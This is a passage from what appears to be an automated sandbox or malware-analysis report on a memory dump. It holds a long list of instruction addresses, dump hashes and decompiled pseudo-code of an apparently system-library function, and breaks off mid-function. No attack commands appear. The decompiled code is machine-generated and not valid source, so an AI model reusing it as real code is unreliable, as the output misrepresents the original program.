									if((_v24 & 0x00000001) != 0) {
										_t390 = _t426;
										L228:
										 *(_t488 + 4) = _t390 | 0x00000001;
									}
									goto L11;
								}
								 *(_t488 + 4) = _t422;
								if((_v24 & 0x00000001) == 0) {
									goto L11;
								} else {
									_t390 = _t422;
									goto L228;
								}
							}
							goto L11;
						}
					}
				}
			}

0x019ef90b
0x019ef911
0x019ef917
0x019ef919
0x019ef91c
0x01a45d63
0x01a45d69
0x01a45d69
0x01a45d63
0x019ef922
0x019ef927
0x01a45d72
0x01a45d78
0x01a45d78
0x01a45d72
0x019ef92d
0x019ef931
0x019efa2d
0x019efa2d
0x019ef939
0x019ef940
0x019ef944
0x019efa37
0x019efa39
0x019efa3c
0x019efa3e
0x019efa41
0x019efa48
0x019efe68
0x019efe6c
0x019efe6c
0x019efe78
0x019efe78
0x019efe7a
0x019efe7a
0x019efe7e
0x019efe6e
0x019efe6e
0x019efe72
0x00000000
0x00000000
0x00000000
0x019efe80
0x019efe80
0x019efe83
0x00000000
0x019efe83
0x01a45d7f
0x01a45d81
0x00000000
0x00000000
0x01a45d87
0x00000000
0x01a45d87
0x019efa4e
0x019efa50
0x01a45d90
0x00000000
0x00000000
0x01a45d98
0x019efa58
0x019efa58
0x019efa5d
0x019efa60
0x019efa63
0x019efa69
0x019efa6b
0x019efa6e
0x019efa71
0x01a45da1
0x01a45da7
0x01a45da7
0x01a45da1
0x019efa79
0x019f0071
0x019f0073
0x019f0074
0x00000000
0x019efa7f
0x019efa83
0x019efa85
0x01a45dae
0x01a45dae
0x019efa8b
0x019efa8f
0x019efa98
0x019efaa1
0x019efaa4
0x019efaa6
0x019efaa9
0x019efaac
0x01a45db7
0x01a45dbd
0x01a45dbd
0x01a45db7
0x019efab4
0x00000000
0x019efaba
0x019efabc
0x019efac2
0x019efac5
0x019efac7
0x019efac7
0x019efad6
0x019efad9
0x019efadf
0x019efae2
0x019efae4
0x019efae7
0x019efaea
0x019efaed
0x01a45dc4
0x01a45dc9
0x00000000
0x00000000
0x01a45dcf
0x019efaf6
0x019efafa
0x019efafc
0x019efafc
0x019efafe
0x019efb01
0x019efb09
0x019efb0c
0x019efb12
0x019efb14
0x019efb17
0x01a45dd6
0x01a45dd9
0x01a45dde
0x00000000
0x00000000
0x01a45de4
0x01a45de7
0x019efb29
0x019efb2c
0x01a45df3
0x01a45df6
0x01a45e06
0x01a45e0c
0x01a45e0f
0x01a45e11
0x00000000
0x01a45e1f
0x00000000
0x01a45e1f
0x01a45e11
0x01a45df8
0x01a45dfb
0x01a45e00
0x00000000
0x00000000
0x01a45e02
0x00000000
0x01a45e02
0x019efb32
0x019efb35
0x019efb3c
0x01a45e26
0x01a45e28
0x01a45e28
0x01a45e2e
0x01a45e3c
0x01a45e3c
0x01a45e2e
0x019efb45
0x019efb47
0x019efb53
0x019efb56
0x019efb59
0x019efb5c
0x019efb65
0x019f000d
0x00000000
0x019f000f
0x019f000f
0x00000000
0x019f000f
0x019efb6b
0x019efb6e
0x019efb71
0x019efb73
0x019efb76
0x01a45e45
0x01a45e4b
0x01a45e4b
0x01a45e45
0x019efb80
0x019efb83
0x01a45e54
0x01a45e5a
0x01a45e5a
0x01a45e54
0x019efb89
0x019efb98
0x019efb9b
0x019efb9e
0x019efba0
0x01a45e63
0x01a45e69
0x01a45e69
0x01a45e63
0x019efba8
0x00000000
0x019efbae
0x019efbb2
0x01a45e70
0x019efbb8
0x019efbb8
0x019efbb8
0x019efbbd
0x019efbbf
0x019efbbf
0x019ef9a8
0x019ef9a8
0x019ef9ad
0x019ef9b4
0x01a45eda
0x00000000
0x00000000
0x01a45ee2
0x019ef9bc
0x019ef9bc
0x019ef9bf
0x019ef9c4
0x019efde6
0x019efde9
0x019efdec
0x019efdef
0x019efdf2
0x01a45eeb
0x01a45ef1
0x01a45ef1
0x01a45eeb
0x019efdfa
0x00000000
0x019efe00
0x019efe04
0x01a45efa
0x01a45f00
0x01a45f00
0x01a45efa
0x019efe0a
0x019efa24
0x019efa2a
0x019efa2a
0x019efdfa
0x019ef9cd
0x00000000
0x019ef9cf
0x019ef9cf
0x019ef9d1
0x019ef9d4
0x019ef9d7
0x019ef9d9
0x019ef9dc
0x019ef9df
0x019ef9e2
0x019ef9e7
0x01a45f09
0x00000000
0x00000000
0x01a45f11
0x019ef9ef
0x019ef9f3
0x019efed5
0x019efed8
0x019efedb
0x01a45f1a
0x01a45f20
0x01a45f20
0x01a45f1a
0x019efee3
0x00000000
0x019efee9
0x019efeeb
0x01a45f29
0x01a45f2f
0x01a45f2f
0x01a45f29
0x019efef3
0x00000000
0x019efef9
0x019efefc
0x019eff01
0x01a45f38
0x019f0052
0x019f0054
0x00000000
0x019f0056
0x019f0056
0x019eff40
0x019eff42
0x01a45f6e
0x01a45f74
0x01a45f74
0x01a45f6e
0x019eff50
0x019eff56
0x019eff5b
0x01a45f7d
0x00000000
0x00000000
0x01a45f83
0x00000000
0x019eff61
0x019eff61
0x019eff63
0x019f0021
0x019f0026
0x019f002b
0x019f007e
0x019f0080
0x019f0080
0x019f007e
0x019f002f
0x00000000
0x019f0031
0x019f0033
0x019f0086
0x019f0035
0x019f0035
0x019f0035
0x019f003c
0x00000000
0x019f003c
0x019f002f
0x019eff69
0x019eff6b
0x01a45f8c
0x01a45f92
0x01a45f92
0x01a45f8c
0x019eff74
0x019eff77
0x019eff7b
0x01a45f99
0x01a45f9b
0x019eff81
0x019eff81
0x019eff83
0x019eff83
0x019eff88
0x019eff8b
0x019eff90
0x019eff92
0x019eff92
0x019eff9c
0x019effa2
0x019effa6
0x019effaa
0x019effad
0x019effb2
0x01a45fa4
0x01a45faa
0x01a45faa
0x01a45fa4
0x019effb8
0x00000000
0x019effb8
0x019eff5b
0x019f0054
0x01a45f3e
0x01a45f3e
0x019eff09
0x00000000
0x00000000
0x019eff0f
0x019eff14
0x01a45f47
0x01a45f4d
0x01a45f4d
0x01a45f47
0x019eff1c
0x019f0046
0x019f0076
0x019f0078
0x00000000
0x019f0048
0x019f0048
0x019f004a
0x019f004a
0x00000000
0x019f004a
0x019eff22
0x019eff22
0x019eff26
0x01a45f56
0x01a45f5c
0x01a45f5c
0x01a45f56
0x019eff2e
0x00000000
0x019eff34
0x019eff36
0x01a45f65
0x019eff3c
0x019eff3c
0x019eff3c
0x019eff3e
0x00000000
0x019eff3e
0x019eff2e
0x019eff1c
0x019efef3
0x019efee3
0x019ef9f9
0x019ef9f9
0x019ef9fb
0x019ef9ff
0x019efbd5
0x01a45fb1
0x01a45fb1
0x019efbdf
0x00000000
0x019efbe5
0x019efbe5
0x019efbe8
0x019efbed
0x01a45fdf
0x019efc01
0x019efc01
0x019efc04
0x019efc09
0x01a45fee
0x01a45ff4
0x01a45ff4
0x01a45fee
0x019efc0f
0x019efc13
0x019efc1d
0x019efc20
0x019efc23
0x019efc26
0x019efc2b
0x01a45ffd
0x01a46003
0x01a46003
0x01a45ffd
0x019efc33
0x00000000
0x019efc39
0x019efc3b
0x019efc3e
0x019efc41
0x019efc46
0x01a4600c
0x01a46012
0x01a46012
0x01a4600c
0x019efc4e
0x00000000
0x019efc54
0x019efc54
0x019efc59
0x01a4601b
0x01a46021
0x01a46021
0x01a4601b
0x019efc61
0x00000000
0x019efc67
0x019efc6a
0x019efc6f
0x01a4602a
0x01a46030
0x01a46030
0x01a4602a
0x019efc77
0x00000000
0x019efc7d
0x019efc7f
0x019efc81
0x019efc85
0x019efc87
0x019efc87
0x019efc8c
0x019efc8f
0x019efc94
0x01a46039
0x019efc9c
0x019efca4
0x019efcaa
0x019efcaf
0x01a46046
0x019efcbd
0x019efcbf
0x01a4606d
0x01a46073
0x01a46073
0x01a4606d
0x019efcc8
0x019efccd
0x019efccf
0x019efcd3
0x019efcd5
0x019efcd5
0x019efcde
0x019efce1
0x019efce3
0x019efce3
0x019efce8
0x019efcf0
0x019efcf2
0x019efcf5
0x019efcf7
0x019efcff
0x019efd02
0x019efd06
0x019efd11
0x019efd14
0x019efd17
0x01a4607c
0x01a46082
0x01a46082
0x01a4607c
0x019efd1f
0x00000000
0x019efd25
0x019efd28
0x019efd2d
0x01a4608b
0x01a46091
0x01a46091
0x01a4608b
0x019efd35
0x00000000
0x019efd3b
0x019efd3e
0x019efd43
0x01a4609a
0x019f0016
0x019f0018
0x00000000
0x019f001a
0x019f001a
0x019efd82
0x019efd84
0x01a460d9
0x01a460df
0x01a460df
0x01a460d9
0x019efd8d
0x019efd95
0x019efd98
0x019efd9d
0x01a460e8
0x00000000
0x00000000
0x01a460ee
0x00000000
0x019efda3
0x019efda3
0x019efda5
0x019efe8b
0x019efe90
0x019efe95
0x01a460f7
0x01a460fd
0x01a460fd
0x01a460f7
0x019efe9d
0x00000000
0x019efea3
0x019efea5
0x01a46106
0x019efeab
0x019efeab
0x019efeab
0x019efeb2
0x019efeb5
0x00000000
0x019efeb5
0x019efe9d
0x019efdab
0x019efdad
0x01a4610f
0x01a46115
0x01a46115
0x01a4610f
0x019efdb6
0x019efdbb
0x01a4611e
0x01a46120
0x019efdc1
0x019efdc1
0x019efdc5
0x019efdc5
0x019efdc7
0x019efdcc
0x019efdce
0x019efdce
0x019efdd6
0x019efdd8
0x00000000
0x019efdd8
0x019efd9d
0x019f0018
0x01a460a0
0x01a460a0
0x019efd4b
0x00000000
0x00000000
0x019efd51
0x019efd56
0x01a460a9
0x01a460af
0x01a460af
0x01a460a9
0x019efd5e
0x019efebf
0x01a460b8
0x019efec5
0x019efec5
0x019efec5
0x019efec7
0x00000000
0x019efd64
0x019efd64
0x019efd68
0x01a460c1
0x01a460c7
0x01a460c7
0x01a460c1
0x019efd70
0x00000000
0x019efd76
0x019efd78
0x01a460d0
0x019efd7e
0x019efd7e
0x019efd7e
0x019efd80
0x00000000
0x019efd80
0x019efd70
0x019efd5e
0x019efd35
0x019efd1f
0x01a4604c
0x01a4604c
0x019efcb7
0x019effc0
0x019effc3
0x019effc6
0x019effcb
0x01a46055
0x01a4605b
0x01a4605b
0x01a46055
0x019effd3
0x00000000
0x019effd9
0x019effdb
0x01a46064
0x019effe1
0x019effe1
0x019effe1
0x019effe3
0x019effe7
0x019effed
0x00000000
0x019effed
0x019effd3
0x00000000
0x019efcb7
0x01a4603f
0x019efc9a
0x00000000
0x019efc9a
0x019efc77
0x019efc61
0x019efc4e
0x019efc33
0x01a45fe5
0x01a45fe5
0x019efbf5
0x00000000
0x00000000
0x00000000
0x00000000
0x019efbf5
0x019efbdf
0x019efa05
0x019efa05
0x019efa0a
0x019efe14
0x01a45fb8
0x01a45fb8
0x019efe1e
0x00000000
0x019efe24
0x00000000
0x019efe24
0x019efe1e
0x019efa10
0x019efa10
0x019efa15
0x019efe29
0x019efe2d
0x019efe35
0x019efe38
0x019efe3b
0x01a45fc1
0x00000000
0x00000000
0x01a45fc7
0x019efe43
0x019efe45
0x00000000
0x00000000
0x019efe4b
0x019efe50
0x01a45fd0
0x01a45fd6
0x01a45fd6
0x01a45fd0
0x019efe5d
0x019efe60
0x00000000
0x019efe60
0x019efe41
0x019efe41
0x00000000
0x019efa1b
0x019efa1b
0x019efa1d
0x019efa20
0x00000000
0x019efa20
0x019efa15
0x019ef9ed
0x019ef9ed
0x00000000
0x019ef9ed
0x019ef9cd
0x019ef9ba
0x019ef9ba
0x00000000
0x019ef9ba
0x019efba8
0x019efb65
0x019efb1d
0x019efb23
0x019efb26
0x00000000
0x019efb26
0x019efaf3
0x019efaf3
0x00000000
0x019efaf3
0x019efab4
0x019efa79
0x019efa56
0x019efa56
0x00000000
0x019efa56
0x019ef94d
0x019ef950
0x019ef955
0x01a45e79
0x01a45e7f
0x01a45e7f
0x01a45e79
0x019ef95b
0x019ef960
0x01a45e88
0x01a45e8a
0x01a45e8a
0x01a45e8e
0x01a45e93
0x00000000
0x01a45e99
0x01a45e9c
0x01a45e9f
0x01a45ea1
0x01a45ea3
0x01a45ea3
0x01a45ea7
0x00000000
0x01a45ea7
0x019ef966
0x019ef966
0x019ef96b
0x01a45eb0
0x01a45eb6
0x01a45eb6
0x01a45eb0
0x019ef973
0x019efbc7
0x019ef9a5
0x019ef9a5
0x00000000
0x019ef979
0x019ef97d
0x019ef97f
0x01a45ebf
0x01a45ec5
0x01a45ec5
0x01a45ebf
0x019ef987
0x00000000
0x019ef98d
0x019ef98d
0x019ef990
0x019ef994
0x019ef997
0x019ef99f
0x019efff7
0x019f0061
0x019f0064
0x019f006a
0x01a45ece
0x01a45ed0
0x01a45ed0
0x00000000
0x019f0064
0x019efffd
0x019f0000
0x00000000
0x019f0006
0x01a45ecc
0x00000000
0x01a45ecc
0x019f0000
0x00000000
0x019ef99f
0x019ef987
0x019ef973

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction ID: 3a9b1e53bb7a22c2da073373fcda4a5d0daca26294ebb71d2c8d4aa4a5fcbdb9
Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
Instruction Fuzzy Hash: 1462D332E046529BDF23CF2CC44466ABBE5AF85711F2D89AADDAD9B243D371D841C780

Uniqueness

Uniqueness Score: -1.00%

Function 01AB5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01AB5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1ac1178);
				E01A3D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01AB4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E01A2D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01AB5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x1ad60e8;
								if( *0x1ad60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x1ad60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01A29710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01A26DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E01A2F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E01A2F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E01A2F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E01A2FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E01A2FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E01A2F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E01A2F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
